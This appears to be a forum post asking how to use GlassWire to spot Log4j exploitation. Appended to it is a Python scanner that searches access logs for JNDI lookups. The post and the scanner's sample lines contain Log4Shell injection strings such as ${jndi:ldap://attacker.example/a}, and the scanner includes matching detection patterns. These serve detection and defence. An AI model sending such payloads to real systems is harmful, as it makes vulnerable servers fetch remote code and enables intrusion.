Question for you guys regarding the Log4j zero-day.
Can I use GlassWire to find applications running log4j on my personal network?
From what I understand you should be able to query based on the HTTP request that is traveling outbound:
${jndi:ldap://[attacker site]/a}
Some hackers are aware of this, and have been modifying the outbound queries, but the surefire string to search on would be “jndi”. Please help me use this tool to identify log4j requests from the various applications that I use on my computer. I want to make sure that I am reasonably covering my bases here.
More info on Log4j if you’re new to the convo:
Technical:
Technicalish:
Reddit:
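The string search described in the post, as an added example that is not part of the original post: a Python scan of web-server access log lines that reports parsed `${jndi:...}` lookups and, separately, any line that only contains the bare "jndi" keyword. The log format, function names and the `attacker.example` host are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# A full lookup such as ${jndi:ldap://host/a}; scheme and host are captured.
LOOKUP_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/\s}:]+)", re.I)
# The bare keyword the post calls the surefire search string.
KEYWORD_RE = re.compile(r"jndi", re.I)

def decode(text, max_rounds=3):
    """Undo percent-encoding, repeating in case a value was encoded more than once."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_line(line):
    """Classify one log line: 'lookup' (parsed), 'keyword' (bare jndi) or None."""
    text = decode(line)
    hits = [(m["scheme"].lower(), m["host"].lower()) for m in LOOKUP_RE.finditer(text)]
    if hits:
        return {"level": "lookup", "targets": hits}
    if KEYWORD_RE.search(text):
        # No parseable lookup, but the keyword is present: queue for manual review.
        return {"level": "keyword", "targets": []}
    return None

def scan_log(lines):
    """Return (line_number, finding) for every line that matched."""
    results = []
    for number, line in enumerate(lines, start=1):
        finding = scan_line(line)
        if finding:
            results.append((number, finding))
    return results

# Constructed sample lines (not real traffic); attacker.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.7 - - [12/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.4 - - [12/Dec/2021:10:02:00 +0000] "GET /docs/jndi-overview.html HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Dec/2021:10:02:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG):
        print(number, finding["level"], finding["targets"])
```

A "keyword" result is a prompt to read the line by hand rather than a confirmed lookup; the third sample line shows a harmless URL that lands there.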